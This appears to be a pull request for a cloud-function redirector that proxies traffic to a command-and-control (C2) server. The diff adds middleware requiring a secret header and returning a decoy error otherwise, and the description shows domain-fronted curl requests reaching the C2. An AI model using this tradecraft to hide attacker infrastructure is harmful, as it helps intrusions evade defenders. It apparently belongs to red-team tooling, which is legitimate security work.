### PR TITLE
Update index.js

### DIFF
--- a/functions/index.js
+++ b/functions/index.js
@@ -8,6 +8,19 @@ var http = require('http'), httpProxy = require('http-proxy');
 
 var proxy = httpProxy.createProxyServer({secure:false,xfwd:true});
 
+/* Require a header, useful to require a particular header to access the page (helps hide origin C2) - Optional
+app.use('', (req, res, next) => {
+   if (req.headers.PutAUniqueHeaderHere) {
+       next();
+   } else {
+       res.send('{ "Error": "Invalid Authentication." }');
+	// You can  also do a generic 403,500,etc
+    	// res.status(403);
+   }
+});
+*/
+
+
 /* your C2 must have a URI . In this case I am using /api/" */
 app.all('/api/*', function(req, res, next){
     console.log(req.url);


### PR DESCRIPTION
Added the ability in the function to allow for a static header to be set which will be required by all requests, if it doesn't exist present a custom error message or a generic HTTP status code. 

Adjust C2 profile to contain the header so all connectivity from them will flow through. The remaining traffic will be discarded without the header.

```
Sample with "someHeader" set, connecting to the C2 successfully.

# curl -skv -H "someHeader: randomValue" https://fronted-domain/api/login --header "Host:yourUniqueCustom.web.app"
* Connection #0 to host fronted-domain left intact
{"ResponseFromYourC2"}
* Closing connection 0
#

Sample with no header set (generic internet traffic), getting custom error message.

# curl -skv https://fronted-domain/api/login --header "Host:yourUniqueCustom.web.app"
* Connection #0 to host fronted-domain left intact
{ "Error": "Invalid Authentication." }
* Closing connection 0
#
```